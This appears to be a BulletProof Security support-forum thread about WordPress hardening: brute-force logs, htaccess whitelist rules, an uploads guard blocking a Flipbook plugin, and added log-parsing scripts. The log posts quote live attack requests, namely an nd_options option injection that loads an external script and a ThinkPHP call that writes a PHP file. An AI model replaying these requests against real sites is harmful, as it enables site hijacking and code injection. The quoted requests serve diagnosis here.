Channel: BulletProof Security Forum » All Posts

Reply To: Plugin Firewall Whitelist Rules not being added

Well the brute force attack is not as big as I thought.  Yep, you can tell your site is under a brute force attack by checking the BPS Security Log.  When you see several Security Log entries being logged every second continuously then yep a brute force bot attack is occurring on your website.  The bots are hitting your Login page and your xml-rpc.php file continuously.

Ok the 3 problems are fixed and I found 1 other issue, which is your wp-config.php file was quarantined, but I checked the wp-config.php file in Quarantine and did not see any differences in the code in the file.  I assume you were manually editing your wp-config.php file or maybe another plugin or your theme was adding or removing code or just doing a flush.  If you were manually editing your wp-config.php file then you can use the AutoRestore|Quarantine Standard Procedural Steps when manually modifying files method > http://forum.ait-pro.com/forums/topic/autorestore-quarantine-guide-read-me-first/#procedural-steps or just Restore files in Quarantine after you edit them manually.

I will post the forum links to the fixes I did with additional help info in a minute.


Reply To: Plugin Firewall Whitelist Rules not being added

1. The Plugin Firewall is blocking plugin .js scripts and AutoPilot Mode is not automatically whitelisting those .js scripts.

Solution:  No solution needed. Most likely since the site is currently undergoing a significant brute force attack then Plugin Firewall AutoPilot Mode may have been temporarily impacted.  Plugin Firewall AutoPilot Mode is automatically creating new whitelist rules successfully.  Note:  I turned On Plugin Firewall Test Mode to speed up the process of adding any new additional Plugin Firewall whitelist rules.

2. It appears that you are using the BPS POST Attack Bonus Custom Code and need to add an additional whitelist rule for this Query String:  wc-ajax=get_refreshed_fragments

Solution:  Added the 2 new Query String whitelist rules (in bold font below) in your existing BPS POST Attack Protection Bonus Custom Code and moved the POST Attack Protection code into this Custom Code text box:  8. CUSTOM CODE WP REWRITE LOOP START.
Forum Solution Reference Link:  https://forum.ait-pro.com/forums/topic/whitelist-monarch-plugin/#post-37359

# BPS POST Request Attack Protection
RewriteCond %{REQUEST_METHOD} POST [NC]
# NEVER COMMENT OUT THIS LINE OF CODE BELOW FOR ANY REASON
RewriteCond %{REQUEST_URI} !^.*/wp-admin/ [NC]
# NEVER COMMENT OUT THIS LINE OF CODE BELOW FOR ANY REASON
RewriteCond %{REQUEST_URI} !^.*/wp-cron.php [NC]
# NEVER COMMENT OUT THIS LINE OF CODE BELOW FOR ANY REASON
RewriteCond %{REQUEST_URI} !^.*/wp-login.php [NC]
# Whitelist WP JSON POST Requests by Query String
RewriteCond %{QUERY_STRING} !^_locale=(.*) [NC]
# Whitelist the WordPress Theme Customizer
RewriteCond %{HTTP_REFERER} !^.*/wp-admin/customize.php [NC]
# Whitelist XML-RPC Pingbacks, JetPack and Remote Posting POST Requests
RewriteCond %{REQUEST_URI} !^.*/xmlrpc.php [NC]
# Whitelist Jetpack JSON POST Request
RewriteCond %{REQUEST_URI} !^.*/wp-json/jetpack/(.*) [NC]
# Whitelist Network|Multisite Signup POST Form Requests
RewriteCond %{REQUEST_URI} !^.*/wp-signup.php [NC]
# Whitelist Network|Multisite Activate POST Form Requests
RewriteCond %{REQUEST_URI} !^.*/wp-activate.php [NC]
# Whitelist Trackback POST Requests
RewriteCond %{REQUEST_URI} !^.*/wp-trackback.php [NC]
# Whitelist Comments POST Form Requests
RewriteCond %{REQUEST_URI} !^.*/wp-comments-post.php [NC]
# Example 1: Whitelist Star Rating Calculator POST Form Requests
RewriteCond %{REQUEST_URI} !^.*/star-rating-calculator.php [NC]
# Example 2: Whitelist Contact Form POST Requests
RewriteCond %{REQUEST_URI} !^.*/contact/ [NC]
# Example 3: Whitelist PayPal IPN API Script POST Requests
RewriteCond %{REQUEST_URI} !^.*/ipn_handler.php [NC]
# Whitelist WooCommerce POST Request to Root URI by Query String
RewriteCond %{QUERY_STRING} !^wc-ajax=(.*) [NC]
# Whitelist WooCommerce POST Request to Root URI by Query String
RewriteCond %{QUERY_STRING} !^wc-api=(.*) [NC]
RewriteRule ^(.*)$ - [F]

3. You need to add a wp-admin htaccess file whitelist rule for the WP admin-ajax.php file and/or this Query String:  action=quick_preivew

Solution:  Added an admin-ajax.php file skip rule in BPS wp-admin Custom Code.
Forum Solution Reference Link:  https://forum.ait-pro.com/forums/topic/nextgen-gallery-pro-post-request-blocked/#post-35621

Reply To: Plugin Firewall Whitelist Rules not being added

So, I noticed the quarantine as well, after the theme developer logged in a day or two ago. I forgot to tell him about BPS Pro.

I just restored the file because I figured he didn’t know about it and made a change to the file.

As for the brute force attack, it does seem big. The security log file has over 900 requests for the wp-login.php file from late this morning and it’s increased another 120k just from reading your last message!

I had copied the log and then deleted it because I noticed it was increasing in size so fast.

Feature Request? Maybe you could add a limit size to the log, that the user can set, so that in cases like this the file size doesn’t get too big.

Reply To: Plugin Firewall Whitelist Rules not being added

Yep, the attack on your site is fairly big, but sometimes our forum site gets attacked for days at a rate of 1,000 attacks per second.  Luckily the way we have designed BPS Pro, it deflects all attacks instead of creating any significant resource usage for your server/website.  In other words, everything functions and performs as if the attack were not occurring at all.

That feature has already been added to the Security Log. 😉  You don’t need to do anything with the Security Log.  When the Security Log reaches the size setting that you have chosen or the default size setting then it will be automatically zipped, emailed to you and replaced with a new blank Security Log file.

Reply To: Plugin Firewall Whitelist Rules not being added

That feature already exists for the Security Log.  Not sure if you thought I was saying we will add that or if you understood that the Security Log already has completely automated functionality for exactly this type of scenario – i.e. massive brute force attacks can fill up several Security Log files in a day.

Reply To: Plugin Firewall Whitelist Rules not being added

Ok, I found it. Under S-Monitor.

Thanks.

Reply To: Security Log Event Codes

I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing its job – however is there a weakness this attempt is trying to exploit?

[403 GET Request: 06.08.2019 - 10:15]
BPS: 3.5
WP: 5.2.2
Event Code: WPADMIN-SBR
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 159.69.154.78
Host Name: static.78.154.69.159.clients.your-server.de
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

Reply To: Security Log Event Codes

This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code.  To check if your website is hacked do the steps below:

1. Go to your website’s home page.
2. Right mouse click and click View page source (Google Chrome) or a similar command for other Browsers.
3. Use your Browser’s Find… command (Google Chrome – located under settings > Find…) and enter this search string:  nd_options
4. If you see/find Source Code that looks like this below then your website is hacked.
5. Let me know if your Browser Find/Search finds any search results or not.

httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
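The Security Log checks described in this thread (many entries per minute for the login page, and requests carrying the nd_options query string) can be run offline over a saved copy of the log. The script below is an added example, not code from BPS or from the forum posts; it assumes the entry layout shown in the posts, assumes a POST entry header has the same form as the GET one, and uses constructed sample entries with placeholder addresses and a placeholder domain.

```python
import re
from collections import Counter

HEADER = re.compile(r"^\[(\d{3}) (\w+) Request: (.+?)\s*\]$")
PROBE = re.compile(r"nd_options_value_import_settings=(\w+)"
                   r"\[nd_options_option_value\](.*?)&?\[nd_options_end_option\]")

def parse_entries(text):
    """Split a Security Log into dicts: header fields plus each 'KEY: value' line."""
    entries, cur = [], None
    for line in text.splitlines():
        m = HEADER.match(line.strip())
        if m:
            cur = {"status": m.group(1), "method": m.group(2), "when": m.group(3)}
            entries.append(cur)
        elif cur is not None and ":" in line:
            key, _, value = line.partition(":")
            cur[key.strip()] = value.strip()
    return entries

def hits_per_minute(entries):
    """Count entries per (timestamp, path); the header stamps to the minute."""
    return Counter((e["when"], e.get("REQUEST_URI", "").split("?", 1)[0])
                   for e in entries)

def nd_options_requests(entries):
    """Return (client address, setting name, value) for each nd_options request."""
    found = []
    for e in entries:
        m = PROBE.search(e.get("QUERY_STRING", ""))
        if m:
            found.append((e.get("REMOTE_ADDR"), m.group(1), m.group(2)))
    return found

# Constructed sample in the entry layout shown in this thread; the addresses
# and the domain are documentation placeholders, not values from a real log.
LOGIN_ENTRY = ("[403 POST Request: 06.08.2019 - 10:14]\nREMOTE_ADDR: 192.0.2.10\n"
               "REQUEST_METHOD: POST\nREQUEST_URI: /wp-login.php\nQUERY_STRING:\n\n")
PROBE_QS = ("nd_options_value_import_settings=siteurl[nd_options_option_value]"
            "https://example.com/pret.js?l=1&[nd_options_end_option]")
SAMPLE_LOG = LOGIN_ENTRY * 3 + (
    "[403 GET Request: 06.08.2019 - 10:15]\nEvent Code: WPADMIN-SBR\n"
    "REMOTE_ADDR: 192.0.2.77\nREQUEST_METHOD: GET\n"
    f"REQUEST_URI: /wp-admin/admin-ajax.php?{PROBE_QS}\n"
    f"QUERY_STRING: {PROBE_QS}\n")

if __name__ == "__main__":
    entries = parse_entries(SAMPLE_LOG)
    for (when, path), n in hits_per_minute(entries).most_common():
        print(f"{n:4d}  {when}  {path}")
    for addr, name, value in nd_options_requests(entries):
        print(f"nd_options request from {addr}: {name} -> {value}")
```

Any domain this reports is a string to search for in the page source and the database alongside nd_options.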

Plugin Flipbook blocked – 403 error

Good day, BPS Pro seems to block the new plugin “Flipbook” that I just installed. How can I allow “Flipbook” to run with BPS Pro?

I get the “403 forbidden error page”

[New DB Table Created - Cron Check Time Monday, July 22, 2019 - 8:43 am]
New DB Table Created Name: wp_flipbook
New DB Table Actual Create Time: 2019-07-22 08:32:16
DB Monitor Guide: https://forum.ait-pro.com/forums/topic/database-monitor-dbm-guide/

Thank you

Reply To: Plugin Flipbook blocked – 403 error

You can ignore the DB Monitor log entry.  Go to the BPS Pro Security Log page, look for the Security Log entry regarding the Flipbook 403 log entry and post it in your forum reply so I can see what is being blocked.

Reply To: Plugin Flipbook blocked – 403 error

[403 GET Request: mardi, 6 aout, 2019 - 1:23 ]

BPS Pro: 13.4
WP: ***
Event Code: UAEGWR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/uploads-anti-exploit-guard-uaeg-read-me-first/
REMOTE_ADDR: ***********
Host Name: 77-93-55-206.static.cogecodata.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER: http://www.golfdorval.com/wordpress/wp-admin/admin.php?page=flipbook_view_book&bookid=1
REQUEST_URI: /wordpress/wp-content/uploads/flipbook/1/book.html
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36

Reply To: Plugin Flipbook blocked – 403 error

What is being blocked is the book.html file in the flipbook folder: /wordpress/wp-content/uploads/flipbook/ by BPS Pro Uploads Anti-Exploit Guard (UAEG).

Go to the BPS Pro > htaccess File Editor tab page > click the “Your Current Uploads htaccess File” tab > copy the entire contents of your UAEG htaccess file and post it in your forum reply.  I will create a whitelist rule for you in your UAEG code so that you can copy and paste the modified code into the UAEG Custom Code text box.

Reply To: Plugin Flipbook blocked – 403 error

# BULLETPROOF PRO UPLOADS FOLDER .HTACCESS
#
# BPS mod_access_compat
# Allow,Deny
# First, all Allow directives are evaluated. At least one must match, or the request is rejected.
# Next, all Deny directives are evaluated. If any matches, the request is rejected.
# Last, any requests which do not match an Allow or a Deny directive are denied by default.
#
# Deny,Allow
# First, all Deny directives are evaluated. If any match, the request is denied unless
# it also matches an Allow directive. Any requests which do not match any Allow or Deny directives are permitted.
#
# *Match* -------------------- *Allow,Deny result* -------------------- *Deny,Allow result*
# Match Allow only ----------- Request allowed ------------------------ Request allowed
# Match Deny only ------------ Request denied ------------------------- Request denied
# No match ------------------- Default to second directive: Denied ---- Default to second directive: Allowed
# Match both Allow & Deny ---- Final match controls: Denied ----------- Final match controls: Allowed
#
# NOTE: The zip file extension can be added to block remote access or execution of zip files, several plugins create
# create either temporary or permanent zip files in the uploads folder. This may block those plugins from being
# able to create zip files in your uploads folder.
#
# BEGIN WHITELIST
# Examples of whitelisting are commented out below. To create whitelist rules you would delete the # sign in front
# of the whitelist rule you want to use, add the actual filename or folder name you want to whitelist and also
# delete the # sign in front of #Allow from env=whitelist.
# Whitelist a specific js file in the uploads folder: example.js
#SetEnvIf Request_URI "example.js$" whitelist
# Whitelist an entire folder in the uploads folder: /uploads/example-folder/
#SetEnvIf Request_URI "example-folder/.*$" whitelist
# END WHITELIST
#
# FORBID THESE FILE EXTENSIONS FROM BEING ACCESSED OR EXECUTED REMOTELY
<FilesMatch "\.(7z|as|bat|bin|cgi|chm|chml|class|cmd|com|command|dat|db|db2|db3|dba|dll|DS_Store|exe|gz|hta|htaccess|htc|htm|html|htx|idc|ini|ins|isp|jar|jav|java|js|jse|jsfl|json|jsp|jsx|lib|lnk|out|php|phps|php5|php4|php3|phtml|phpt|pl|py|pyd|pyc|pyo|rar|shtm|shtml|sql|swf|sys|tar|taz|tgz|tpl|vb|vbe|vbs|war|ws|wsf|xhtml|xml|z)$">
Order Allow,Deny
#Allow from env=whitelist
Deny from all
</FilesMatch>

# FORBID PHP FILES DISGUISED AS AN IMAGE FILE - example.php.jpg - example.PHP.jpg
<FilesMatch "\.(php|PHP|\.+(php)|\.+(PHP)).*$">
Order Allow,Deny
#Allow from env=whitelist
Deny from all
</FilesMatch>

Reply To: Plugin Flipbook blocked – 403 error

1. Go to the BPS Pro > B-Core > Custom Code tab page.
2. Click the UAEG htaccess File Custom Code accordion button/tab.
3. Copy your modified UAEG htaccess code below into the CUSTOM CODE UAEG text box.
4. Click the Save UAEG Custom Code button.
5. Go to the Security Modes tab page > scroll down to the UAEG section and click the Activate button.

# BULLETPROOF PRO UPLOADS FOLDER .HTACCESS
#
# BPS mod_access_compat
# Allow,Deny
# First, all Allow directives are evaluated. At least one must match, or the request is rejected.
# Next, all Deny directives are evaluated. If any matches, the request is rejected.
# Last, any requests which do not match an Allow or a Deny directive are denied by default.
#
# Deny,Allow
# First, all Deny directives are evaluated. If any match, the request is denied unless
# it also matches an Allow directive. Any requests which do not match any Allow or Deny directives are permitted.
#
# *Match* -------------------- *Allow,Deny result* -------------------- *Deny,Allow result*
# Match Allow only ----------- Request allowed ------------------------ Request allowed
# Match Deny only ------------ Request denied ------------------------- Request denied
# No match ------------------- Default to second directive: Denied ---- Default to second directive: Allowed
# Match both Allow & Deny ---- Final match controls: Denied ----------- Final match controls: Allowed
#
# NOTE: The zip file extension can be added to block remote access or execution of zip files, several plugins create
# create either temporary or permanent zip files in the uploads folder. This may block those plugins from being
# able to create zip files in your uploads folder.
#
# BEGIN WHITELIST
# Examples of whitelisting are commented out below. To create whitelist rules you would delete the # sign in front
# of the whitelist rule you want to use, add the actual filename or folder name you want to whitelist and also
# delete the # sign in front of #Allow from env=whitelist.
# Whitelist a specific js file in the uploads folder: example.js
#SetEnvIf Request_URI "example.js$" whitelist
# Whitelist an entire folder in the uploads folder: /uploads/example-folder/
SetEnvIf Request_URI "flipbook/.*$" whitelist
# END WHITELIST
#
# FORBID THESE FILE EXTENSIONS FROM BEING ACCESSED OR EXECUTED REMOTELY
<FilesMatch "\.(7z|as|bat|bin|cgi|chm|chml|class|cmd|com|command|dat|db|db2|db3|dba|dll|DS_Store|exe|gz|hta|htaccess|htc|htm|html|htx|idc|ini|ins|isp|jar|jav|java|js|jse|jsfl|json|jsp|jsx|lib|lnk|out|php|phps|php5|php4|php3|phtml|phpt|pl|py|pyd|pyc|pyo|rar|shtm|shtml|sql|swf|sys|tar|taz|tgz|tpl|vb|vbe|vbs|war|ws|wsf|xhtml|xml|z)$">
Order Allow,Deny
Allow from env=whitelist
Deny from all
</FilesMatch>

# FORBID PHP FILES DISGUISED AS AN IMAGE FILE - example.php.jpg - example.PHP.jpg
<FilesMatch "\.(php|PHP|\.+(php)|\.+(PHP)).*$">
Order Allow,Deny
#Allow from env=whitelist
Deny from all
</FilesMatch>
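The interaction of Order, Allow from env=whitelist and Deny from all in the first FilesMatch section can be checked against the table in the file's own header comments. The model below is an added example, not BPS code: it abbreviates the extension list, ignores every other rule on the server, and uses constructed request URIs apart from the book.html path taken from the Security Log entry. Because Deny from all matches every request, the "Match both Allow & Deny" row applies to a whitelisted file: denied under Order Allow,Deny, allowed under Order Deny,Allow.

```python
import re

# Abbreviated from the FilesMatch extension list in the UAEG file above.
FORBIDDEN_EXT = re.compile(r"\.(htm|html|js|json|php|xml)$")
# SetEnvIf Request_URI "flipbook/.*$" whitelist
WHITELIST_URI = re.compile(r"flipbook/.*$")

def access_decision(order, allow_matches, deny_matches):
    """mod_access_compat result, per the table in the file's header comments."""
    if order == "Allow,Deny":
        # An Allow must match, and any Deny match then rejects the request.
        return "allowed" if allow_matches and not deny_matches else "denied"
    if order == "Deny,Allow":
        # A Deny match rejects unless an Allow also matches; no match is allowed.
        return "denied" if deny_matches and not allow_matches else "allowed"
    raise ValueError(f"unknown Order: {order}")

def uaeg_decision(request_uri, order, allow_line_active=True):
    """Model the first FilesMatch section for one request URI."""
    filename = request_uri.rsplit("/", 1)[-1]
    if not FORBIDDEN_EXT.search(filename):
        return "allowed"  # section does not apply (simplification: no other rules)
    env_whitelist = WHITELIST_URI.search(request_uri) is not None
    allow_matches = allow_line_active and env_whitelist  # Allow from env=whitelist
    deny_matches = True                                  # Deny from all
    return access_decision(order, allow_matches, deny_matches)

# Constructed request URIs; the first is the path from the Security Log entry.
REQUESTS = [
    "/wordpress/wp-content/uploads/flipbook/1/book.html",
    "/wordpress/wp-content/uploads/2019/07/dropped.html",
    "/wordpress/wp-content/uploads/2019/07/photo.jpg",
]

if __name__ == "__main__":
    for uri in REQUESTS:
        for order in ("Allow,Deny", "Deny,Allow"):
            print(f"{order:11s} {uaeg_decision(uri, order):8s} {uri}")
```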

Reply To: Plugin Flipbook blocked – 403 error

ok I did the change but still the same problem, see the security log

[403 GET Request: mardi, 6 aout, 2019 - 3:21 ]
BPS Pro: 13.4
WP: ****
Event Code: UAEGWR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/uploads-anti-exploit-guard-uaeg-read-me-first/
REMOTE_ADDR: **********
Host Name: 77-93-55-206.static.cogecodata.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER: http://www.golfdorval.com/wordpress/guide-du-terrain-de-golf/?preview_id=4404&preview_nonce=96a500deed&preview=true
REQUEST_URI: /wordpress/wp-content/uploads/flipbook/2/book.html
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36

Thank you

Reply To: Plugin Flipbook blocked – 403 error

Are you sure you did all of the steps above correctly?  I tried to check your server type and it appears your server type information is being blocked/protected.  If you did all the steps correctly then maybe your host server type does not support the SetEnvIf directive. Go to the BPS Pro System Info page (under the Logs & Info main menu) and copy and paste these 2 things below.

Server Type: Apache
Operating System: Linux

Reply To: Plugin Flipbook blocked – 403 error

OK, here are the two things from System Info

Server Type: Apache
Operating System: Linux

Reply To: Plugin Flipbook blocked – 403 error

Alright so there is not a problem with the SetEnvIf directive then.  If you want me to login to your website and figure out the problem then send a WordPress Administrator login user account to:  info at ait-pro dot com. Or you can choose to deactivate the BPS Pro UAEG feature.  It’s an extra security feature that is not that important.

Reply To: Plugin Flipbook blocked – 403 error

Ok thank you for your help.  I deactivated the BPS Pro UAEG feature. Now I don’t have the 403 error but instead of the flipbook I get the front page of the web site instead (the index page) so I guess I will survive without the flipbook.

Thanks again for your support.

 
